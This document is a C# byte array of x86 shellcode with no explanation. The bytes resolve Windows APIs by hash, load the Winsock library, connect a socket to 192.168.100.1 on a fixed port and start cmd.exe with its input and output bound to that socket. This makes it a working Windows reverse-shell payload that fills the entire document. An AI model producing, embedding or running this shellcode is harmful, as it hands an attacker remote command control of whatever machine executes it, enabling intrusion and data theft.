byte[] buf = {
0x89, 0xe5, 0x81, 0xc4, 0xa0, 0xf6, 0xff, 0xff, 0x31, 0xc9, 0x64, 0x8b, 0x71, 0x30, 0x8b, 0x76, 
0x0c, 0x8b, 0x76, 0x1c, 0x8b, 0x5e, 0x08, 0xbf, 0xe0, 0xff, 0xff, 0xff, 0xf7, 0xdf, 0x01, 0xf7, 
0x8b, 0x3f, 0x8b, 0x36, 0x66, 0x39, 0x4f, 0x18, 0x75, 0xea, 0xeb, 0x06, 0x5e, 0x89, 0x75, 0x04, 
0xeb, 0x5c, 0xe8, 0xf5, 0xff, 0xff, 0xff, 0x60, 0x8b, 0x43, 0x3c, 0x8b, 0x7c, 0x03, 0x78, 0x01, 
0xdf, 0x8b, 0x4f, 0x18, 0xba, 0xe0, 0xff, 0xff, 0xff, 0xf7, 0xda, 0x01, 0xfa, 0x8b, 0x02, 0x01, 
0xd8, 0x89, 0x45, 0xfc, 0xe3, 0x36, 0x49, 0x8b, 0x45, 0xfc, 0x8b, 0x34, 0x88, 0x01, 0xde, 0x31, 
0xc0, 0x99, 0xfc, 0xac, 0x84, 0xc0, 0x74, 0x07, 0xc1, 0xca, 0x0d, 0x01, 0xc2, 0xeb, 0xf4, 0x3b, 
0x54, 0x24, 0x24, 0x75, 0xdf, 0x8b, 0x57, 0x24, 0x01, 0xda, 0x66, 0x8b, 0x0c, 0x4a, 0x8b, 0x57, 
0x1c, 0x01, 0xda, 0x8b, 0x04, 0x8a, 0x01, 0xd8, 0x89, 0x44, 0x24, 0x1c, 0x61, 0xc3, 0x68, 0x83, 
0xb9, 0xb5, 0x78, 0xff, 0x55, 0x04, 0x89, 0x45, 0x08, 0x68, 0x8e, 0x4e, 0x0e, 0xec, 0xff, 0x55, 
0x04, 0x89, 0x45, 0x0c, 0x68, 0x72, 0xfe, 0xb3, 0x16, 0xff, 0x55, 0x04, 0x89, 0x45, 0x10, 0x31, 
0xc0, 0x66, 0xb8, 0x6c, 0x6c, 0x50, 0x68, 0x33, 0x32, 0x2e, 0x64, 0x68, 0x77, 0x73, 0x32, 0x5f, 
0x54, 0xff, 0x55, 0x0c, 0x89, 0xc3, 0x68, 0xcb, 0xed, 0xfc, 0x3b, 0xff, 0x55, 0x04, 0x89, 0x45, 
0x14, 0x68, 0xd9, 0x09, 0xf5, 0xad, 0xff, 0x55, 0x04, 0x89, 0x45, 0x18, 0x68, 0x0c, 0xba, 0x2d, 
0xb3, 0xff, 0x55, 0x04, 0x89, 0x45, 0x1c, 0x31, 0xc9, 0x89, 0xe0, 0x66, 0xb9, 0x90, 0x05, 0x29, 
0xc8, 0x50, 0x31, 0xc0, 0x66, 0xb8, 0x02, 0x02, 0x50, 0xff, 0x55, 0x14, 0x31, 0xc0, 0x50, 0x50, 
0x50, 0xb0, 0x06, 0x50, 0x2c, 0x05, 0x50, 0x40, 0x50, 0xff, 0x55, 0x18, 0x89, 0xc6, 0x31, 0xc0, 
0x50, 0x50, 0x68, 0xc0, 0xa8, 0x64, 0x01, 0x66, 0xb8, 0xad, 0x9b, 0xc1, 0xe0, 0x10, 0x66, 0x83, 
0xc0, 0x02, 0x50, 0x54, 0x5f, 0x31, 0xc0, 0x50, 0x50, 0x50, 0x50, 0x04, 0x10, 0x50, 0x57, 0x56, 
0xff, 0x55, 0x1c, 0x56, 0x56, 0x56, 0x31, 0xc0, 0x50, 0x50, 0xb0, 0x7f, 0xfe, 0xc0, 0x31, 0xc9, 
0xb1, 0x7f, 0xfe, 0xc1, 0x01, 0xc8, 0x50, 0x31, 0xc0, 0x50, 0x50, 0x50, 0x50, 0x50, 0x50, 0x50, 
0x50, 0x50, 0x50, 0xb0, 0x44, 0x50, 0x54, 0x5f, 0x31, 0xc0, 0xb4, 0x65, 0xc1, 0xe0, 0x08, 0x66, 
0xb8, 0x65, 0x78, 0x50, 0x68, 0x63, 0x6d, 0x64, 0x2e, 0x54, 0x5b, 0x89, 0xe0, 0x31, 0xc9, 0x66, 
0xb9, 0x90, 0x03, 0x29, 0xc8, 0x50, 0x57, 0x31, 0xc0, 0x50, 0x50, 0x50, 0x40, 0x50, 0x48, 0x50, 
0x50, 0x53, 0x50, 0xff, 0x55, 0x10, 0x31, 0xc0, 0x50, 0x6a, 0xff, 0xff, 0x55, 0x08
}